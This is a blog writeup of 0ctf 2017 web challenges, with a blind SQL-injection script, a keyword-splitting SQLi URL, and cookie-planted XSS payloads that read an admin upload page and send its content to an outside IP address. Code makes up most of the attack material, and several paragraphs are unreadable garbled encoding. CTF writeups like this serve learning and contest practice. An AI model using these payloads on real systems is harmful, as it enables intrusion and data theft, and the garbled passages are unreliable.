LoRexxar's Blog

0ctf2017 web writeup (partial)

2017/03/21

绾康涓嬪伔鍋风櫥涓婅悓鏂版绗竴鐨勬瘮璧涳紝涔熷疄鐜颁簡姣旇禌鍓嶇殑鎰挎湜锛0ctf浜夊彇涓0鍒嗭紝rsctf浜夊彇楂樺悕娆★紝:>

[images]

Temmo's Tiny Shop

The challenge is a site resembling a small shop. The most interesting part was at the very beginning: you came in with plenty of money, could buy whatever you wanted, and could also see the hint

```
OK! Now I will give some hint: you can get flag by use `select flag from b7d8769d64997e392747dbad9cd450c4`
```

Later the challenge was suddenly changed and you only had 4000, not enough to buy the hint, which was annoying... (from other writeups, admin had a weak password or something, and that account had over a million to spend freely...)

Walking through the whole site gives the following information:

1. After logging in you can buy items, and purchases can be refunded; this process needs no verification or anything, but there is no race condition to exploit.

2. The buy/refund logic has an id, but no matter how I tested it nothing worked; probably there is an intval on it.

3. action is a whitelist: anything other than the few needed values is blocked outright. order is a blacklist.

4. There is no second-order injection that can be detected directly.

So the problem is clear: order by is the most likely injection point. Brutally, though, the WAF here is very confusing and there is also a length limit. I didn't step on that landmine myself, but I think without the hint it wouldn't be injectable (not enough length).

order has both a whitelist and a blacklist; it seems only \w gets through. Special symbols and Chinese punctuation don't work either, and the keywords user and database are detected. Whitelist: &,()0-9a-Z

But you can do blind injection with left and like: when the condition holds the listing is sorted by name, otherwise by price (you need to have bought 2 different items so the ordering is observable).

One key point about the blind injection: order has a length limit, and the length is not enough for us to add a function that extracts a single character, so we can only use % as a wildcard to match the trailing character and extend the prefix one position at a time. Script as follows

```python
import requests

url = "http://202.120.7.197/"
cookie = {'PHPSESSID': 'qlqmjbq7uglcr0onm1lmm4ndg4'}

# Baseline response: a condition expected to be false, so the list is sorted by price.
# (This table name differs from the one in the hint; both appear in the original post.)
r = requests.get(url + 'app.php?action=search&keyword=&order=if((select(left((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),3))like(0x2562)),name,price)', cookies=cookie)
err = r.text

# Candidate characters. '_' and '%' are LIKE wildcards and match anything, so they
# sit last and are only picked when no literal character matched.
s = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$\'()*+,-./:;<=>?@[\\]^`{|}~\'"_%'

def check(payload):
    r = requests.get(url + 'app.php?action=search&keyword=&order=' + payload, cookies=cookie)
    return r.text

flag = ""
for m in range(1, 35):
    for i in s:
        # left(flag, m) LIKE '%X' (0x25 is '%') is true when the m-th character is X;
        # true sorts by name, false by price, so a response that differs from the
        # baseline is a hit. Under a case-insensitive (_ci) collation, MySQL's default,
        # LIKE cannot tell 'a' from 'A', so the lowercase letters tested first win.
        payload = "if((select(left((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%s))like(0x25%s)),name,price)" % (str(m), hex(ord(i))[2:])
        if check(payload) != err:
            flag += i
            print(flag)
            break
```

KoG

杩欓鍏跺疄璇磋捣鏉ユ尯闅惧緱锛屼笉鏄痡s鑰佸徃鏈烘牴鏈皟涓嶅嚭鏉ワ紝鎵撳紑棰樼洰灏辫兘鐪嬪嚭鏉ヤ簡锛岄〉闈腑鏄氳繃id鏉ヨ绠楀搷搴旂殑hash鐒跺悗璇锋眰鏈嶅姟鍣紝鐒跺悗id杩欓噷鏄湁鍒ゆ柇鐨勶紝濡傛灉琚嫤浜嗗氨浼氳繑鍥 wrongboy锛屼负浜嗚兘寰楀埌鎯宠鐨勫瓧绗︿覆锛屾垜闇瑕佷笅鏂偣鎶婂嚑涓垽鏂烦杩囥

As the saying goes, JS obfuscation is always a paper tiger.

Setting breakpoints and tracing the checks, I found that flipping a few variables to true/false produces the correct hash for a string parameter. I saved the script locally and edited it, deleting logic as I traced, and in the end found that the most essential solution is to change every check

of the form

```javascript
($33<<24>>24)>(47);
($36<<24>>24)<(58)
```

that restricts a value to the range between 47 and 58 (there are several such places, though some are unused) into the form below. The ($n<<24>>24)==(0) checks can be left alone

```javascript
($variable<<24>>24)>(0);
($variable<<24>>24)<(128);
```

Then I tested locally and it passed. After that it is the most ordinary injection; nothing more to say.
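As an added illustration (not the challenge's obfuscated script, which is not reproduced here): the pattern `($n<<24>>24)>(47)` / `($n<<24>>24)<(58)` is a per-character range test, and the rewrite to `>(0)` / `<(128)` widens it. The functions below are written for this post; the check names, the validator structure and the sample id are assumptions.

```javascript
// Added example for this post; not the challenge's script.
// "x << 24 >> 24" keeps only the low byte of x and sign-extends it, which
// the obfuscated code uses as a cheap cast to a signed 8-bit value.
function toSignedByte(x) {
  return (x << 24) >> 24;
}

// Original form of the check from the writeup: ($n<<24>>24)>(47) && ($n<<24>>24)<(58).
// 47 < code < 58 is exactly the ASCII digits '0'..'9', so only numeric ids pass.
function originalCheck(code) {
  const b = toSignedByte(code);
  return b > 47 && b < 58;
}

// Patched form from the writeup: ($n<<24>>24)>(0) && ($n<<24>>24)<(128).
// Every ASCII character from 1 to 127 now passes, quotes and spaces included;
// bytes >= 128 sign-extend to negative values and are still rejected.
function patchedCheck(code) {
  const b = toSignedByte(code);
  return b > 0 && b < 128;
}

// Apply a per-character check to a whole id the way a client-side validator
// would before computing the request hash (assumed structure, for illustration).
function idAccepted(id, check) {
  if (id.length === 0) return false;
  for (let i = 0; i < id.length; i++) {
    if (!check(id.charCodeAt(i))) return false;
  }
  return true;
}

// A constructed injection string: rejected by the original check, accepted once patched.
const SAMPLE_ID = "1' or 1=1#";
```

Since the check runs in the client, patching it only changes which strings the browser is willing to hash; the server never saw the check, which is why the patched page produces a valid hash for any string.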

simplesqlin

This challenge is actually simple to describe, but it relies on an uncommon piece of black magic. The injection point is right in front of you, and it looks as if nothing is filtered, but in fact the main statement keywords are all blocked; once select is killed there is not much left to do, and the current table has nothing useful in it.

I don't know where this black magic was first disclosed, but the article I read was this one

https://www.exploit-db.com/papers/17934/

Inserting something like %00 in the middle of select bypasses the WAF; I didn't test it carefully, but basically any %0X works.

payload

```
http://202.120.7.203/index.php?id=5 union sele%0bct 1,(selec%00t flag fro%00m flag limit 0,1),3%23
```
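An added example, not the challenge's actual filter: a hypothetical keyword WAF in JavaScript, showing why a `\bselect\b` / `\bfrom\b` blacklist never sees the split keywords in the payload above once the %0b / %00 bytes are decoded, and what a normalising filter would have done with them. Which keywords the real filter blocked, and why the database accepted the split tokens, are not verified here; the payload string is the one from this section.

```javascript
// Added example for this post; a hypothetical reimplementation, not the
// challenge's real WAF.  The payload is the one from the writeup.
const PAYLOAD = "5 union sele%0bct 1,(selec%00t flag fro%00m flag limit 0,1),3%23";

// Assumption: the filter blocked the statement keywords the payload splits,
// and looked for them as whole words, case-insensitively.
const BLOCKED = /\b(select|from)\b/i;

// Percent-decode the raw query string the way the web server does before
// the value reaches the application.
function decodeParam(raw) {
  return raw.replace(/%([0-9a-fA-F]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Naive filter: regex over the decoded value.  "sele\x0bct" and "selec\x00t"
// never match \bselect\b because the control byte splits the token, so the
// payload sails through while a plain "select" is still caught.
function naiveWafBlocks(raw) {
  return BLOCKED.test(decodeParam(raw));
}

// Hardened filter: strip ASCII control bytes before matching, so the
// fragments are glued back together and the split keywords are visible.
// (A blacklist is still the wrong tool; parameterised queries are the fix.)
function normalizedWafBlocks(raw) {
  const cleaned = decodeParam(raw).replace(/[\x00-\x1f\x7f]/g, "");
  return BLOCKED.test(cleaned);
}

// Which blocked keywords are visible in a given text, in order, for inspection.
function visibleKeywords(text) {
  return (text.match(/\b(select|from)\b/gi) || []).map(k => k.toLowerCase());
}
```

The normalising filter only closes this one gap; whatever byte the database tolerates inside a keyword, a filter that does not tokenise the way the database does will keep missing variants, which is the general lesson behind the exploit-db paper linked above.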

复杂xss (Complex XSS)

A challenge I thought was excellent; below I go into a bit more detail.

绗竴涓〉闈rl鏄http://government.vip/

[image]

The flag is in another domain, http://admin.government.vip:8000

绗竴閮ㄥ垎杩欓噷payload鏄病鍋氫换浣曢檺鍒剁殑锛屼綘鍙互闅忎究鏋勯犱竴涓猧mg鏍囩鐒跺悗鐩戝惉杩囧幓鐪嬬湅锛岃繖閲屾槸鍙互鎵ц浠绘剰js鐨勩

Next open http://admin.government.vip:8000 directly: there is a login box, and test/test logs in. Looking carefully around the site, we get this piece of information

[image]

The username shown on the page is taken from the cookie, and the username cookie is not HttpOnly; by setting that cookie we can construct an XSS and run arbitrary JS, but the page has a sandbox that disables some functions.

We also saw the challenge hint that only admin can upload a shell. Visiting upload: the page exists, GET returns 405, only POST is accepted.

A brief summary of what we have:

1. url1 is the root of the whole site, and arbitrary JS can run there

2. url2 is a subdomain of that site, and JS can run there by setting a cookie

3. Our goal is to upload a file on admin and also get the response back

You might think these conditions are not enough, because you may not know how cookies are scoped.

[image]

First, JS can set cookies

But on the web there is the problem everyone knows about: the same-origin policy

[image]

With cookies, however, things are a bit different

[image]

Cookies do not distinguish ports, nor http from https (unless the cookie carries the Secure attribute), and the Domain attribute matches upward: a cookie set for a parent domain is sent to all of its subdomains. Another example

[image]

In other words, from the root domain we can set a cookie that applies to its subdomains.

So the first part's payload is

```html
<script>
document.cookie="username=a<script>window.location.href='http://115.28.78.16?id=test'<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>
```
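An added example that is not part of the original post: a small model of RFC 6265 cookie scoping in JavaScript, to make the rules above concrete (a page may set a cookie for its own parent domain, that cookie is then sent to every subdomain, and neither port nor scheme takes part in the match). Hostnames are the challenge's; the cookie jar, function names and sample values are assumptions.

```javascript
// Added example for this post; a minimal model of RFC 6265 cookie scoping,
// not any browser's or the challenge's code.  Hostnames are the challenge's.

// RFC 6265 section 5.1.3: a host domain-matches a cookie domain when they are
// equal or the host ends with "." + domain.  Leading dots are ignored and
// matching is case-insensitive.  (IP-address hosts, which the RFC excludes, are not handled.)
function domainMatches(requestHost, cookieDomain) {
  const host = requestHost.toLowerCase();
  const domain = cookieDomain.toLowerCase().replace(/^\./, "");
  return host === domain || host.endsWith("." + domain);
}

// RFC 6265 section 5.1.4 path matching.
function pathMatches(requestPath, cookiePath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// Model of document.cookie = "name=value; domain=...; path=...; secure" run by a
// script on originUrl.  Section 5.3 step 6: the Domain attribute must domain-match
// the setting host, so a page may set cookies for itself and its parents
// (government.vip may set .government.vip) but never for a sibling or a child only.
function setCookie(jar, originUrl, name, value, attrs = {}) {
  const origin = new URL(originUrl);
  const domain = (attrs.domain || origin.hostname).toLowerCase().replace(/^\./, "");
  if (!domainMatches(origin.hostname, domain)) return false;
  jar.push({
    name, value, domain,
    hostOnly: !attrs.domain,          // no Domain attribute => exact host only
    path: attrs.path || "/",
    secure: Boolean(attrs.secure),
  });
  return true;
}

// Build the Cookie header a browser would attach to requestUrl.  Neither the
// port nor the scheme takes part in the match; only the Secure flag looks at the scheme.
function cookiesFor(jar, requestUrl) {
  const u = new URL(requestUrl);
  return jar
    .filter(c => (c.hostOnly ? u.hostname === c.domain : domainMatches(u.hostname, c.domain)))
    .filter(c => pathMatches(u.pathname, c.path))
    .filter(c => !c.secure || u.protocol === "https:")
    .map(c => `${c.name}=${c.value}`)
    .join("; ");
}
```

The model also shows the defensive side: a cookie set without a Domain attribute is host-only and never reaches a subdomain, and a Secure cookie is withheld from plain http. Neither helps the challenge's admin site, because the attacker controls the parent domain and sets the Domain attribute explicitly.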

Now the problem: reading the upload page's content by writing JS. In my test this returned 405; in 小m's writeup he did read the content here... I don't quite understand it either

Here I hit a new obstacle: the sandbox

```html
<script>
//sandbox
delete window.Function;
delete window.eval;
delete window.alert;
delete window.XMLHttpRequest;
delete window.Proxy;
delete window.Image;
delete window.postMessage;
</script>
```

In any case I had no way to request the upload content under the sandbox, so I chose to inject an iframe tag, then read the iframe's content and send it back.

payload

```html
<script>
document.cookie="username=aa<iframe id='test' src='upload'></iframe><script>window.location.href='http://115.28.78.16?id='+encodeURIComponent(document.getElementById('test').contentWindow.document.documentElement.outerHTML)<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>
```

Right after that I found that the upload page has no sandbox, so by writing JS into the iframe and executing it there (a fresh window with its own untouched XMLHttpRequest) we can do whatever we want

```html
<script>
document.cookie="username=aa</iframe><script>var iframe = document.createElement('iframe')<\/script><script>iframe.id = 'ddog'<\/script><script>iframe.name = 'iframe1'<\/script><script>iframe.src='upload'<\/script><script>document.body.appendChild(iframe)<\/script><script>var content=\"<script>var xhr = new XMLHttpRequest()<\\/script><script>xhr.open('POST', 'upload', false)<\\/script><script>xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded')<\\/script><script>xhr.send('file=a')<\\/script><script>var mess = xhr.response<\\/script><script>document.write(encodeURIComponent(mess))<\\/script>\"<\/script><script>setTimeout(\"iframe.contentWindow.document.write(content)\", 3000)<\/script><script>document.body.appendChild(iframe)<\/script><script>window.onload = setTimeout(\"window.location.href='http://115.28.78.16?id='+encodeURIComponent(document.getElementById('ddog').contentWindow.document.documentElement.outerHTML)\",3000)<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>
```

There is probably no other way. A key point is the same-origin policy: only when we load a page from the same origin in the iframe and then send the xhr to upload from there does it work; otherwise the same-origin policy blocks it. Next we need to construct the file-upload JS; this can be copied straight out of burp

```html
<script>
function submitRequest()
{
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "upload.php", false);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------12264101169922");
  xhr.withCredentials = true;
  var body = "-----------------------------12264101169922\r\n" +
    "Content-Disposition: form-data; name=\"file\"; filename=\"shell\"\r\n" +
    "Content-Type: text/plain\r\n" +
    "\r\n" +
    "shell\r\n" +
    "-----------------------------12264101169922\r\n" +
    "Content-Disposition: form-data; name=\"submit\"\r\n" +
    "\r\n" +
    "\xcc\xe1\xbd\xbb\xb2\xe9\xd1\xaf\r\n" +
    "-----------------------------12264101169922--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
  alert(xhr.response)
}
submitRequest()
</script>
```

Because the code contains too many semicolons, and in a cookie the semicolon separates attributes, it has to be urlencoded, and a dedicated statement is needed to decode it and write it into the page. The final payload is:

```html
<script>
document.cookie="username=aa</iframe><script>var iframe = document.createElement('iframe')<\/script><script>iframe.id = 'ddog'<\/script><script>iframe.name = 'iframe1'<\/script><script>iframe.src='upload'<\/script><script>document.body.appendChild(iframe)<\/script><script>var content=\"<script>document.write(decodeURIComponent('%3Cscript%3E%0Afunction%20submitRequest%28%29%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%0A%20%20%20%20%20%20%20%20xhr.open%28%22POST%22%2C%20%22upload%22%2C%20false%29%3B%0A%20%20%20%20%20%20%20%20xhr.setRequestHeader%28%22Accept%22%2C%20%22text%2fhtml%2Capplication%2fxhtml%2bxml%2Capplication%2fxml%3Bq%3D0.9%2C%2a%2f%2a%3Bq%3D0.8%22%29%3B%0A%20%20%20%20%20%20%20%20xhr.setRequestHeader%28%22Accept-Language%22%2C%20%22zh-CN%2Czh%3Bq%3D0.8%2Cen-US%3Bq%3D0.5%2Cen%3Bq%3D0.3%22%29%3B%0A%20%20%20%20%20%20%20%20xhr.setRequestHeader%28%22Content-Type%22%2C%20%22multipart%2fform-data%3B%20boundary%3D---------------------------12264101169922%22%29%3B%0A%20%20%20%20%20%20%20%20xhr.withCredentials%20%3D%20true%3B%0A%20%20%20%20%20%20%20%20var%20body%20%3D%20%22-----------------------------12264101169922%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22Content-Disposition%3A%20form-data%3B%20name%3D%5C%22file%5C%22%3B%20filename%3D%5C%22shell%5C%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22Content-Type%3A%20text%2fplain%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22shell%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22-----------------------------12264101169922%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22Content-Disposition%3A%20form-data%3B%20name%3D%5C%22submit%5C%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22%5Cxcc%5Cxe1%5Cxbd%5Cxbb%5Cxb2%5Cxe9%5Cxd1%5Cxaf%5Cr%5Cn%22%20%2b%20%0A%20%20%20%20%20%20%20%20%20%20%22-----------------------------12264101169922--%5Cr%5Cn%22%3B%0A%20%20%20%20%20%20%20%20var%20aBody%20%3D%20new%20Uint8Array%28body.length%29%3B%0A%20%20%20%20%20%20%20%20for%20%28var%20i%20%3D%200%3B%20i%20%3C%20aBody.length%3B%20i%2b%2b%29%0A%20%20%20%20%20%20%20%20%20%20aBody%5Bi%5D%20%3D%20body.charCodeAt%28i%29%3B%20%0A%20%20%20%20%20%20%20%20xhr.send%28new%20Blob%28%5BaBody%5D%29%29%3B%0A%20%20%20%20%20%20%20%20document.write%28encodeURIComponent%28xhr.response%29%29%0A%20%20%20%20%20%20%7D%0A%0AsubmitRequest%28%29%0A%3C%2fscript%3E'))<\\/script>\"<\/script><script>setTimeout(\"iframe.contentWindow.document.write(content)\", 3000)<\/script><script>document.body.appendChild(iframe)<\/script><script>window.onload = setTimeout(\"window.location.href='http://115.28.78.16?id='+encodeURIComponent(document.getElementById('ddog').contentWindow.document.documentElement.outerHTML)\",3000)<\/script>;domain=.government.vip; path=/;"
window.location.href="http://admin.government.vip:8000";
</script>
```

get flag

simplexss

Honestly this challenge is a bit hard; in the end I was tripped up by a Windows quirk. The WAF filtering is somewhat excessive; after a round of fuzzing, the printable symbols left are

```
*+-<=\^_|~
```

By chance I found that \\1931235898 resolves to the corresponding IP (the address written as a single decimal integer, since . is filtered)

[image]

But a script won't execute, because the script tag can't be closed, so I had to find another way

The solution I came up with was link's import (HTML Imports), a feature newly proposed with HTML5 for loading templates: we can insert a link tag that imports my page remotely and executes its JS. (HTML Imports only ever shipped in Chrome, which has since removed them, so this trick depends on the browser the bot was running at the time.)

The cross-origin problem is easy to solve: just configure your own server so the response header is

```
access-control-allow-origin: *
```

Here is a big pitfall: on Windows `//` (written `\\` in the payload, which browsers treat as `//`) has a special meaning and is resolved as file://, whereas in Firefox, and in Chrome on non-Windows systems, it is resolved with the same protocol as the main site, i.e. https.

In fact, the backend is a Mac... it seems to be a real machine... which means a self-signed certificate would be rejected by the browser outright, and a bare IP won't get a publicly trusted certificate from the usual CAs.

So we have to get around the ban on dots in order to reference a resource on an https site; here the Chinese full-width period (。) can be used, which the browser's URL parser normalises to an ASCII dot.

The final payload is

```html
<link rel=import href=\\xss。lt
```

鎵цjs璇诲彇flag.php灏卞ソ浜
